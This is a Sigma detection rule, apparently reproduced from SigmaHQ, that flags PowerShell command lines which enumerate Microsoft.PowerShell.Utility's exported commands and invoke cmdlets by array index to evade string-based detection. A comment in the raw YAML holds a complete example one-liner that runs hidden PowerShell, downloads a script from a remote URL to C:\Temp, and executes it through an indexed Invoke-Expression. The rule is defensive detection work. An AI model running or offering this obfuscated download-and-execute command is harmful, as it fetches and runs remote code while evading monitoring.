PowerShell Dynamic Module Invocation Via ExportedCommands Array Index


Description

Detects PowerShell processes invoked with obfuscated command lines that enumerate Microsoft.PowerShell.Utility exported commands and invoke cmdlets indirectly by array index. This technique is used to evade detections that look for explicit strings such as Invoke-RestMethod or Invoke-Expression.

Query · sigma

selection_img:
- Image|endswith:
  - \powershell.exe
  - \pwsh.exe
- OriginalFileName:
  - powershell.exe
  - pwsh.dll
selection_module_export_enum:
  CommandLine|contains:
  - 'Get-Module '
  - 'gmo '
  CommandLine|contains|all:
  - ListAvailable
  - Microsoft.PowerShell.Utility
  - ExportedCommands
  - Values
selection_index_used:
  CommandLine|contains: '[*]'
condition: all of selection_*

Known false positives

  • Legitimate use of exported commands array indexing during PowerShell command execution (should be rare)
Raw source PowerShell Dynamic Module Invocation Via ExportedCommands Array Index · Sigma
Esc
Published by SigmaHQ/sigma ↗, licensed under Detection Rule License 1.1 ↗. Reproduced here unmodified.
title: PowerShell Dynamic Module Invocation Via ExportedCommands Array Index
id: 0c3ebe9f-df09-4e00-be0f-73d4ca8d62f6
related:
    - id: 4ff4ad3e-9fb5-4a70-9962-d6ea58090318
      type: similar
status: experimental
description: |
    Detects PowerShell processes invoked with obfuscated command lines that enumerate Microsoft.PowerShell.Utility
    exported commands and invoke cmdlets indirectly by array index. This technique is used to evade
    detections that look for explicit strings such as Invoke-RestMethod or Invoke-Expression.
references:
    - https://www.linkedin.com/posts/mark-o-halloran1_clickfix-defense-evasion-tactic-today-i-ugcPost-7453463467736408064-snrp/
author: Norbert Jaśniewicz (AlphaSOC), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-10-06
tags:
    - attack.execution
    - attack.stealth
    - attack.t1027.010
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    # powershell.exe -NoP -W Hidden -C "$kp=12;$sEzg=32;$cSX=((Get-Module -ListAvailable 'Microsoft.PowerShell.Utility')).ExportedCommands.Values;$cSX=$cSX.Name;& $cSX[$kp] 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1' -OutFile C:\Temp\maldoc.ps1;$qJgm=$cSX[$sEzg];& $qJgm (Get-Content C:\Temp\maldoc.ps1 -Raw)"
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'powershell.exe'
              - 'pwsh.dll'
    selection_module_export_enum:
        CommandLine|contains:
            - 'Get-Module '
            - 'gmo '
        CommandLine|contains|all:
            - 'ListAvailable'
            - 'Microsoft.PowerShell.Utility'
            - 'ExportedCommands'
            - 'Values'
    selection_index_used:
        CommandLine|contains: '[*]'
    condition: all of selection_*
falsepositives:
    - Legitimate use of exported commands array indexing during PowerShell command execution (should be rare)
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_powershell_cmdlet_invocation_via_exported_commands_array_index/info.yml

Detection rules belong to the projects that publish them and remain under their own licenses. This site indexes and links to them; it claims no rights in them.